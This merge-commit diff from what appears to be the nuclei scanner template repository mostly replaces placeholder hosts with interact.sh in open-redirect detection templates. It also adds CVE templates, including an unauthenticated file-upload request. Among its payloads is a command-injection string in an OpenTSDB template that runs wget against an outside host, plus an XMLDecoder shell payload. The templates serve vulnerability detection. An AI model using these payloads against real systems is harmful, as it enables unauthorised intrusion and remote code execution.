Merge branch 'projectdiscovery:master' into dashboard

patch-1
MostInterestingBotInTheWorld 2022-06-06 10:12:35 -04:00 committed by GitHub
commit 8ad6525611
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
120 changed files with 2425 additions and 1918 deletions

View File

@ -1,13 +1,13 @@
cves/2021/CVE-2021-20137.yaml
cves/2021/CVE-2021-24245.yaml
cves/2021/CVE-2021-27519.yaml
exposed-panels/gryphon-login.yaml
exposed-panels/zyxel/zyxel-firewall-panel.yaml
file/audit/cisco/configure-aaa-service.yaml
file/audit/cisco/configure-service-timestamps-debug.yaml
file/audit/cisco/configure-service-timestamps-logmessages.yaml
file/audit/cisco/disable-ip-source-route.yaml
file/audit/cisco/disable-pad-service.yaml
file/audit/cisco/enable-secret-for-password-user-and-.yaml
file/audit/cisco/logging-enable.yaml
file/audit/cisco/set-and-secure-passwords.yaml
cves/2018/CVE-2018-14474.yaml
cves/2018/CVE-2018-16761.yaml
cves/2020/CVE-2020-29597.yaml
cves/2021/CVE-2021-27748.yaml
cves/2022/CVE-2022-29383.yaml
cves/2022/CVE-2022-31268.yaml
exposed-panels/eventum-panel.yaml
exposures/files/appsettings-file-disclosure.yaml
exposures/files/django-secret-key.yaml
exposures/files/ftpconfig.yaml
exposures/files/git-mailmap.yaml
exposures/files/php-ini.yaml
vulnerabilities/other/phpok-sqli.yaml

View File

@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 1191 | daffainfo | 565 | cves | 1196 | info | 1220 | http | 3263 |
| panel | 524 | dhiyaneshdk | 424 | exposed-panels | 533 | high | 895 | file | 68 |
| lfi | 467 | pikpikcu | 316 | vulnerabilities | 458 | medium | 681 | network | 50 |
| xss | 379 | pdteam | 266 | technologies | 258 | critical | 421 | dns | 17 |
| wordpress | 375 | geeknik | 181 | exposures | 205 | low | 186 | | |
| rce | 302 | dwisiswant0 | 168 | misconfiguration | 200 | unknown | 6 | | |
| exposure | 298 | princechaddha | 139 | workflows | 187 | | | | |
| cve2021 | 291 | 0x_akoko | 139 | token-spray | 169 | | | | |
| wp-plugin | 274 | gy741 | 122 | default-logins | 96 | | | | |
| tech | 274 | pussycat0x | 116 | file | 68 | | | | |
| cve | 1195 | daffainfo | 565 | cves | 1200 | info | 1230 | http | 3269 |
| panel | 525 | dhiyaneshdk | 424 | exposed-panels | 535 | high | 899 | file | 76 |
| lfi | 467 | pikpikcu | 316 | vulnerabilities | 458 | medium | 687 | network | 50 |
| xss | 382 | pdteam | 268 | technologies | 258 | critical | 415 | dns | 17 |
| wordpress | 376 | geeknik | 181 | exposures | 205 | low | 186 | | |
| rce | 304 | dwisiswant0 | 168 | misconfiguration | 200 | unknown | 6 | | |
| exposure | 298 | 0x_akoko | 139 | workflows | 187 | | | | |
| cve2021 | 294 | princechaddha | 139 | token-spray | 169 | | | | |
| wp-plugin | 275 | pussycat0x | 124 | default-logins | 96 | | | | |
| tech | 274 | gy741 | 122 | file | 76 | | | | |
**264 directories, 3622 files**.
**265 directories, 3636 files**.
</td>
</tr>

File diff suppressed because one or more lines are too long

File diff suppressed because it is too large Load Diff

View File

@ -1,12 +1,12 @@
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 1191 | daffainfo | 565 | cves | 1196 | info | 1220 | http | 3263 |
| panel | 524 | dhiyaneshdk | 424 | exposed-panels | 533 | high | 895 | file | 68 |
| lfi | 467 | pikpikcu | 316 | vulnerabilities | 458 | medium | 681 | network | 50 |
| xss | 379 | pdteam | 266 | technologies | 258 | critical | 421 | dns | 17 |
| wordpress | 375 | geeknik | 181 | exposures | 205 | low | 186 | | |
| rce | 302 | dwisiswant0 | 168 | misconfiguration | 200 | unknown | 6 | | |
| exposure | 298 | princechaddha | 139 | workflows | 187 | | | | |
| cve2021 | 291 | 0x_akoko | 139 | token-spray | 169 | | | | |
| wp-plugin | 274 | gy741 | 122 | default-logins | 96 | | | | |
| tech | 274 | pussycat0x | 116 | file | 68 | | | | |
| cve | 1195 | daffainfo | 565 | cves | 1200 | info | 1230 | http | 3269 |
| panel | 525 | dhiyaneshdk | 424 | exposed-panels | 535 | high | 899 | file | 76 |
| lfi | 467 | pikpikcu | 316 | vulnerabilities | 458 | medium | 687 | network | 50 |
| xss | 382 | pdteam | 268 | technologies | 258 | critical | 415 | dns | 17 |
| wordpress | 376 | geeknik | 181 | exposures | 205 | low | 186 | | |
| rce | 304 | dwisiswant0 | 168 | misconfiguration | 200 | unknown | 6 | | |
| exposure | 298 | 0x_akoko | 139 | workflows | 187 | | | | |
| cve2021 | 294 | princechaddha | 139 | token-spray | 169 | | | | |
| wp-plugin | 275 | pussycat0x | 124 | default-logins | 96 | | | | |
| tech | 274 | gy741 | 122 | file | 76 | | | | |

View File

@ -9,6 +9,16 @@
"email": ""
}
},
{
"author": "Dhiyaneshwaran",
"links": {
"github": "https://github.com/DhiyaneshGeek",
"twitter": "https://twitter.com/DhiyaneshDK",
"linkedin": "https://www.linkedin.com/in/dhiyaneshwaran-b-27947a131/",
"website": "https://dhiyaneshgeek.github.io/",
"email": ""
}
},
{
"author": "duty_1g",
"links": {

View File

@ -19,13 +19,13 @@ info:
requests:
- method: GET
path:
- '{{BaseURL}}/awstats/awredir.pl?url=example.com'
- '{{BaseURL}}/cgi-bin/awstats/awredir.pl?url=example.com'
- '{{BaseURL}}/awstats/awredir.pl?url=interact.sh'
- '{{BaseURL}}/cgi-bin/awstats/awredir.pl?url=interact.sh'
stop-at-first-match: true
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
# Enhanced by mp on 2022/02/13

View File

@ -18,12 +18,12 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/index.action?redirect:http://www.example.com/"
- "{{BaseURL}}/index.action?redirect:http://www.interact.sh/"
matchers:
- type: regex
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
part: header
# Enhanced by mp on 2022/02/21

View File

@ -19,12 +19,12 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/remotereporter/load_logfiles.php?server=127.0.0.1&url=https://example.com/"
- "{{BaseURL}}/remotereporter/load_logfiles.php?server=127.0.0.1&url=https://interact.sh/"
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
# Enhanced by mp on 2022/02/25

View File

@ -20,10 +20,10 @@ info:
requests:
- method: GET
path:
- '{{BaseURL}}/novius-os/admin/nos/login?redirect=http://example.com'
- '{{BaseURL}}/novius-os/admin/nos/login?redirect=http://interact.sh'
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1

View File

@ -17,10 +17,10 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/stageshow/stageshow_redirect.php?url=http%3A%2F%2Fexample.com"
- "{{BaseURL}}/wp-content/plugins/stageshow/stageshow_redirect.php?url=http%3A%2F%2Finteract.sh"
matchers:
- type: regex
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
part: header

View File

@ -16,10 +16,10 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/CMSPages/GetDocLink.ashx?link=https://example.com/"
- "{{BaseURL}}/CMSPages/GetDocLink.ashx?link=https://interact.sh/"
matchers:
- type: regex
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
part: header

View File

@ -20,10 +20,10 @@ info:
requests:
- method: GET
path:
- '{{BaseURL}}/login?redir=http://www.example.com'
- '{{BaseURL}}/login?redir=http://www.interact.sh'
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1

View File

@ -42,7 +42,7 @@ requests:
<string>-c</string>
</void>
<void index="2">
<string>example.com</string>
<string>interact.sh</string>
</void>
</array>
<void method="start"/></void>

View File

@ -26,7 +26,7 @@ requests:
uname={{username}}&pass={{password}}&xoops_redirect=%2Findex.php&op=login
- |
GET /modules/profile/index.php?op=main&xoops_redirect=https:www.attacker.com HTTP/1.1
GET /modules/profile/index.php?op=main&xoops_redirect=https:www.interact.sh HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
@ -34,4 +34,4 @@ requests:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)attacker\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1

View File

@ -20,12 +20,12 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/OA_HTML/cabo/jsps/a.jsp?_t=fredRC&configName=&redirect=%2f%5cexample.com"
- "{{BaseURL}}/OA_HTML/cabo/jsps/a.jsp?_t=fredRC&configName=&redirect=%2f%5cinteract.sh"
matchers:
- type: word
words:
- 'noresize src="/\example.com?configName='
- 'noresize src="/\interact.sh?configName='
part: body
# Enhanced by mp on 2022/04/14

View File

@ -19,12 +19,12 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}//example.com"
- "{{BaseURL}}//interact.sh"
matchers:
- type: regex
regex:
- "(?m)^(L|l)ocation: (((http|https):)?//(www.)?)?example.com"
- "(?m)^(L|l)ocation: (((http|https):)?//(www.)?)?interact.sh"
part: header
# Enhanced by mp on 2022/04/26

View File

@ -19,10 +19,10 @@ requests:
- method: GET
path:
- '{{BaseURL}}/echo-server.html?code=test&state=http://www.attacker.com#'
- '{{BaseURL}}/echo-server.html?code=test&state=http://www.interact.sh#'
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)attacker\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1

View File

@ -23,10 +23,10 @@ info:
requests:
- method: GET
path:
- '{{BaseURL}}/web/cgi-bin/hi3510/param.cgi?cmd=setmobilesnapattr&cururl=http%3A%2F%2Fattacker.com'
- '{{BaseURL}}/web/cgi-bin/hi3510/param.cgi?cmd=setmobilesnapattr&cururl=http%3A%2F%2Finteract.sh'
matchers:
- type: word
part: body
words:
- '<META http-equiv="Refresh" content="0;URL=http://attacker.com">'
- '<META http-equiv="Refresh" content="0;URL=http://interact.sh">'

View File

@ -0,0 +1,32 @@
id: CVE-2018-14474
info:
name: OrangeForum 1.4.0 - Open Redirect
author: 0x_Akoko
severity: medium
description: |
views/auth.go in Orange Forum 1.4.0 allows Open Redirection via the next parameter to /login or /signup.
reference:
- https://github.com/s-gv/orangeforum/commit/1f6313cb3a1e755880fc1354f3e1efc4dd2dd4aa
- https://seclists.org/fulldisclosure/2019/Jan/32
- https://vuldb.com/?id.122045
- https://nvd.nist.gov/vuln/detail/CVE-2018-14474
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2018-14474
cwe-id: CWE-601
tags: cve,cve2018,redirect,orangeforum,oss
requests:
- method: GET
path:
- '{{BaseURL}}/login?next=http://interact.sh/?app.scan/'
- '{{BaseURL}}/signup?next=http://interact.sh/?app.scan/'
stop-at-first-match: true
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1

View File

@ -22,7 +22,7 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}//www.example.com"
- "{{BaseURL}}//www.interact.sh"
matchers-condition: and
matchers:
@ -31,6 +31,6 @@ requests:
- 301
- type: word
words:
- "Location: https://www.example.com"
- "Location: http://www.example.com"
- "Location: https://www.interact.sh"
- "Location: http://www.interact.sh"
part: header

View File

@ -19,12 +19,12 @@ requests:
- method: GET
path:
- '{{BaseURL}}/IntellectMain.jsp?IntellectSystem=https://www.example.com'
- '{{BaseURL}}/IntellectMain.jsp?IntellectSystem=https://www.interact.sh'
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
# Enhanced by mp on 2022/04/26

View File

@ -0,0 +1,32 @@
id: CVE-2018-16761
info:
name: Eventum v3.3.4 - Open Redirect
author: 0x_Akoko
severity: medium
description: |
Eventum before 3.4.0 has an open redirect vulnerability.
reference:
- https://www.invicti.com/web-applications-advisories/ns-18-021-open-redirection-vulnerabilities-in-eventum/
- https://github.com/eventum/eventum/
- https://www.cvedetails.com/cve/CVE-2018-16761/
- https://github.com/eventum/eventum/releases/tag/v3.4.0
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2018-16761
cwe-id: CWE-601
tags: cve,cve2018,redirect,eventum,oss
requests:
- method: GET
path:
- '{{BaseURL}}/select_project.php?url=http://interact.sh'
- '{{BaseURL}}/clock_status.php?current_page=http://interact.sh'
stop-at-first-match: true
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1

View File

@ -22,8 +22,8 @@ info:
requests:
- method: GET
path:
- '{{BaseURL}}/html/common/forward_js.jsp?FORWARD_URL=http://www.example.com'
- '{{BaseURL}}/html/portlet/ext/common/page_preview_popup.jsp?hostname=example.com'
- '{{BaseURL}}/html/common/forward_js.jsp?FORWARD_URL=http://www.interact.sh'
- '{{BaseURL}}/html/portlet/ext/common/page_preview_popup.jsp?hostname=interact.sh'
stop-at-first-match: true
matchers-condition: and
@ -32,7 +32,7 @@ requests:
- type: word
part: body
words:
- "self.location = 'http://www.example.com'"
- "self.location = 'http://www.interact.sh'"
- type: status
status:

View File

@ -20,7 +20,7 @@ requests:
path:
- '{{BaseURL}}/OA_HTML/lcmServiceController.jsp'
body: <!DOCTYPE root PUBLIC "-//B/A/EN" "http://example.com">
body: <!DOCTYPE root PUBLIC "-//B/A/EN" "http://interact.sh">
matchers-condition: and
matchers:

View File

@ -21,8 +21,8 @@ info:
requests:
- method: GET
path:
- '{{BaseURL}}/redirector.php?url=https://attacker.com'
- '{{BaseURL}}/redirector.php?do=nodelay&url=https://attacker.com'
- '{{BaseURL}}/redirector.php?url=https://interact.sh'
- '{{BaseURL}}/redirector.php?do=nodelay&url=https://interact.sh'
matchers-condition: and
matchers:
@ -30,7 +30,7 @@ requests:
- type: word
part: body
words:
- '<meta http-equiv="refresh" content="0; URL=https://attacker.com">'
- '<meta http-equiv="refresh" content="0; URL=https://interact.sh">'
- type: status
status:

View File

@ -19,10 +19,10 @@ info:
requests:
- method: GET
path:
- '{{BaseURL}}/modules/babel/redirect.php?newurl=http://example.com'
- '{{BaseURL}}/modules/babel/redirect.php?newurl=http://interact.sh'
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)attacker\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1

View File

@ -25,10 +25,10 @@ requests:
Content-Type: application/x-www-form-urlencoded
body: |
success=%2Fshare%2Fpage%2F&failure=:\\example.com&username=baduser&password=badpass
success=%2Fshare%2Fpage%2F&failure=:\\interact.sh&username=baduser&password=badpass
matchers:
- type: regex
part: header
regex:
- "(?m)^(?:Location\\s*:\\s*)(?:https?://|//|\\\\)?(?:[a-zA-Z0-9\\-_]*\\.)?example\\.com(?:\\s*)$"
- "(?m)^(?:Location\\s*:\\s*)(?:https?://|//|\\\\)?(?:[a-zA-Z0-9\\-_]*\\.)?interact\\.sh(?:\\s*)$"

View File

@ -25,7 +25,7 @@ requests:
headers:
Content-Type: application/json
body: |
{"username": "testpoc", "has_admin_role": true, "password": "TestPoc!", "email": "testpoc@example.com", "realname": "poc"}
{"username": "testpoc", "has_admin_role": true, "password": "TestPoc!", "email": "testpoc@interact.sh", "realname": "poc"}
matchers-condition: and
matchers:

View File

@ -20,10 +20,10 @@ info:
requests:
- method: GET
path:
- '{{BaseURL}}/labkey/__r1/login-login.view?returnUrl=http://example.com'
- '{{BaseURL}}/labkey/__r1/login-login.view?returnUrl=http://interact.sh'
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1

View File

@ -20,10 +20,10 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/updating.jsp?url=https://example.com/"
- "{{BaseURL}}/updating.jsp?url=https://interact.sh/"
matchers:
- type: regex
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
part: header

View File

@ -21,13 +21,13 @@ requests:
- method: GET
path:
- '{{BaseURL}}/index.php?redirect=/\/evil.com/'
- '{{BaseURL}}/index.php?redirect=//evil.com'
- '{{BaseURL}}/index.php?redirect=/\/interact.sh/'
- '{{BaseURL}}/index.php?redirect=//interact.sh'
matchers:
- type: regex
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?evil\.com(?:\s*?)$'
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?interact\.sh(?:\s*?)$'
part: header
# Enhanced by mp on 2022/05/04

View File

@ -20,12 +20,12 @@ info:
requests:
- method: GET
path:
- '{{BaseURL}}/%252f%255cexample.com%252fa%253fb/'
- '{{BaseURL}}/%252f%255cinteract.sh%252fa%253fb/'
matchers:
- type: regex
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$'
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$'
part: header
# Enhanced by mp on 2022/05/04

View File

@ -30,7 +30,7 @@ requests:
"upstream":{
"type":"roundrobin",
"nodes":{
"example.com:80":1
"interact.sh:80":1
}
}
}

View File

@ -28,7 +28,7 @@ requests:
btnPost=Log+In&username={{username}}&password={{md5("{{password}}")}}&savedate=0
- |
GET /zb_system/cmd.php?atc=login&redirect=http://www.example.com HTTP/2
GET /zb_system/cmd.php?atc=login&redirect=http://www.interact.sh HTTP/2
Host: {{Hostname}}
cookie-reuse: true
@ -36,4 +36,4 @@ requests:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1

View File

@ -19,10 +19,10 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/email_passthrough.php?email_ID=1&type=link&email_key=5QImTaEHxmAzNYyYvENAtYHsFu7fyotR&redirect_to=http%3A%2F%2Fexample.com"
- "{{BaseURL}}/email_passthrough.php?email_ID=1&type=link&email_key=5QImTaEHxmAzNYyYvENAtYHsFu7fyotR&redirect_to=http%3A%2F%2Finteract.sh"
matchers:
- type: regex
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*?)$'
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?interact\.sh(?:\s*?)$'
part: header

View File

@ -19,10 +19,10 @@ requests:
- method: GET
path:
- '{{BaseURL}}/?url=http://example.com'
- '{{BaseURL}}/?url=http://interact.sh'
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*?)$'
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?interact\.sh(?:\s*?)$'

View File

@ -17,14 +17,14 @@ info:
requests:
- method: GET
path:
- '{{BaseURL}}/find_v2/_click?_t_id=&_t_q=&_t_hit.id=&_t_redirect=https://example.com'
- '{{BaseURL}}/find_v2/_click?_t_id=&_t_q=&_t_hit.id=&_t_redirect=https://interact.sh'
matchers-condition: and
matchers:
- type: word
part: header
words:
- "Location: https://example.com"
- "Location: https://interact.sh"
- type: status
status:

View File

@ -0,0 +1,45 @@
id: CVE-2020-29597
info:
name: IncomCMS 2.0 - Arbitary files upload
author: princechaddha
severity: critical
description: |
IncomCMS 2.0 has a modules/uploader/showcase/script.php insecure file upload vulnerability. This vulnerability allows unauthenticated attackers to upload files into the server.
reference:
- https://github.com/Trhackno/CVE-2020-29597
- https://nvd.nist.gov/vuln/detail/CVE-2020-29597
- https://github.com/M4DM0e/m4dm0e.github.io/blob/gh-pages/_posts/2020-12-07-incom-insecure-up.md
- https://m4dm0e.github.io/2020/12/07/incom-insecure-up.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-29597
cwe-id: CWE-434
metadata:
verified: "true"
tags: cve,cve2020,incomcms,fileupload,intrusive
requests:
- raw:
- |
POST /incom/modules/uploader/showcase/script.php HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBEJZt0IK73M2mAbt
------WebKitFormBoundaryBEJZt0IK73M2mAbt
Content-Disposition: form-data; name="Filedata"; filename="{{randstr}}.png"
Content-Type: image/png
------WebKitFormBoundaryBEJZt0IK73M2mAbt--
- |
GET /upload/userfiles/image/{{randstr}}.png HTTP/1.1
Host: {{Hostname}}
req-condition: true
matchers:
- type: dsl
dsl:
- contains(body_1, '\"name\":\"{{randstr}}.png\"')
- status_code_2 == 200
condition: and

View File

@ -18,7 +18,7 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[33:system(%27wget%20http://example.com%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json"
- "{{BaseURL}}/q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[33:system(%27wget%20http://interact.sh%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json"
matchers-condition: and
matchers:
- type: status

View File

@ -22,10 +22,10 @@ requests:
- method: GET
path:
- '{{BaseURL}}/backend/admin/common/clearcache?previousUrl=http://www.example.com'
- '{{BaseURL}}/backend/admin/common/clearcache?previousUrl=http://www.interact.sh'
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1

View File

@ -3,7 +3,7 @@ id: CVE-2021-20090
info:
name: Buffalo WSR-2533DHPL2 - Path Traversal
author: gy741
severity: high
severity: critical
description: |
Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 are susceptible to a path traversal vulnerability that could allow unauthenticated remote attackers to bypass authentication in their web interfaces.
reference:
@ -11,8 +11,8 @@ info:
- https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2
- https://nvd.nist.gov/vuln/detail/CVE-2021-20090
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-20090
cwe-id: CWE-22
tags: cve,cve2021,lfi,buffalo,firmware,iot,cisa

View File

@ -21,7 +21,7 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/adminer?elastic=example.com&username="
- "{{BaseURL}}/adminer?elastic=interact.sh&username="
matchers-condition: and
matchers:

View File

@ -28,7 +28,7 @@ requests:
"user_login":"{{randstr}}",
"password":"{{randstr}}",
"user_name":"{{randstr}}",
"user_email":"{{randstr}}@example.com"
"user_email":"{{randstr}}@interact.sh"
}
matchers-condition: and

View File

@ -23,7 +23,7 @@ requests:
- |
GET /goform/goform_get_cmd_process?cmd=psw_fail_num_str HTTP/1.1
Host: {{Hostname}}
Referer: http://evil.com/127.0.0.1.html
Referer: http://interact.sh/127.0.0.1.html
matchers-condition: and
matchers:

View File

@ -31,4 +31,4 @@ requests:
- type: word
words:
- "<title>Example Domain</title>"
- "<h1> Interactsh Server </h1>"

View File

@ -20,12 +20,12 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/ads/www/delivery/lg.php?dest=http://example.com"
- "{{BaseURL}}/adserve/www/delivery/lg.php?dest=http://example.com"
- "{{BaseURL}}/adserver/www/delivery/lg.php?dest=http://example.com"
- "{{BaseURL}}/openx/www/delivery/lg.php?dest=http://example.com"
- "{{BaseURL}}/revive/www/delivery/lg.php?dest=http://example.com"
- "{{BaseURL}}/www/delivery/lg.php?dest=http://example.com"
